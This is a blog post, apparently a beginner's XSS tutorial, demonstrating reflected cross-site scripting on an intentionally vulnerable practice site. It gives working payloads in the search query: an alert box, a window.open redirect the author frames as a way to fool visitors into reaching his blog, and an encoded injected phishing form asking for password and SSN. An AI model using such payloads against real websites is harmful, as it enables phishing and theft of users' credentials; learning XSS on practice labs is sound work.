Now, the way you inject your javascript depends on that particular site. There is no mechanism involved, except than to going through the painful process of reading hundreds of lines of code on their client end and hoping that they made mistake. You can find XSS vulnerabilities by using trial and error method on small profile websites but for corporate websites, they are usually secured against such trial and error methods, that means you have to go through the source code and find the programming mistakes.
Definitely, XSS or Cross-Site Scripting is a hot topic. Sometimes, when I'm bored and have nothing to do (which usually doesn't happen too often), I start looking for websites and try to see if they have some kind of vulnerability. I do it just because I like to learn from others and helps me to understand how to protect my websites. Of course, I don't cause any problem or harm anyone, it is just for educational purposes. (Believe me, I'm being honest, lol)
However, it is not "super easy" to find vulnerabilities in websites, and if you want to learn how to work and apply XSS you should go to: http://www.insecurelabs.org/
insecurelabs.org is an educational website which was build intentionally insecure for XSS, great, right!? So if you find XSS flaws, good for you.
Being on this website, you can start testing your scritps, For example, after the URL http://www.insecurelabs.org/ just add this script:
Search.aspx?Query=<script>alert('CSS Vulnerable - found it by BigBangCode')</script>
and hit enter key.
You'll see a dialog box with the text you entered. Of course, the website didn't mean to do that, but you just forced it to do it, feels good, right? lol
Other example,
Imagine you are somewhere in the internet and find this:
http://www.insecurelabs.org/Search.aspx?Query=%3Cscript%3Ewindow.open(%22http://bigbang-code.blogspot.com/%22)%3C/script%3E
at first sight, if you are not careful, just by looking at the first part of the URL (insecurelabs.org) you would think that the link will take you to that website. However, once you clicn on it, you will be redirected to my blog instead (look at the end of the URL). With this technique, taking advantage of this vulnerability we can redirect traffic to our website by fooling poeple. Easy, right?
Wait, wait we are not done, =)
Now, paste this code in your browser and hit enter key:
http://www.insecurelabs.org/Search.aspx?Query=%3Chtml+xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml%27%3E++++%3Chead+%3E+++++++%3Cmeta+http-equiv%3D%27Content-Type%27+content%3D%27text%2Fhtml%3B+charset%3Dutf-8%27%2F%3E+++++++%3Ctitle+%3EPlease+let+me+steal+your+private+information%3C%2Ftitle%3E++++%3C%2Fhead%3E+%3Cbody%3E+%3Ch1%3EPlease+let+me+steal+your+private+information%3C%2Fh1%3E+++%3Cform+id%3D%27sampleform%27+method%3D%27post%27+action%3D%27%27+%3E++++%3Cp%3E++++Name%3A+%3Cinput+type%3D%27text%27+name%3D%27Name%27+%2F%3E++++%3C%2Fp%3E++++%3Cp%3E++++Email%3A+%3Cinput+type%3D%27text%27+name%3D%27Email%27+%2F%3E++++%3C%2Fp%3E++++%3Cp%3E++++pass%3A+%3Cinput+type%3D%27text%27+name%3D%27pass%27+%2F%3E++++%3C%2Fp%3E++++%3Cp%3E++++SSN%3A+%3Cinput+type%3D%27text%27+name%3D%27ssn%27+%2F%3E++++%3C%2Fp%3E+++++%3Cp%3E++++%3Cinput+type%3D%27submit%27+name%3D%27Submit%27+value%3D%27Submit%27+%2F%3E++++%3C%2Fp%3E+%3C%2Fform%3E+++%3C%2Fbody%3E+%3C%2Fhtml%3E
Voila!!... It looks like the webiste has some page with a form that we can fill out with our private and critical information. Of course, it is FAKE!, Some people would think is real because seems to be part of insecurelabs.org . That is why it is so important to look at the URL and make sure we are providing our information to only secure websites. Do we see any "https"? or does it look legit or real? why this website is asking for SSN or credit card info? Alsways ask those kind of questions when sunrfing the internet.
Even if you have 200 years of experience with computers, if you do not have common sense, you can be a victim of cybercrime.
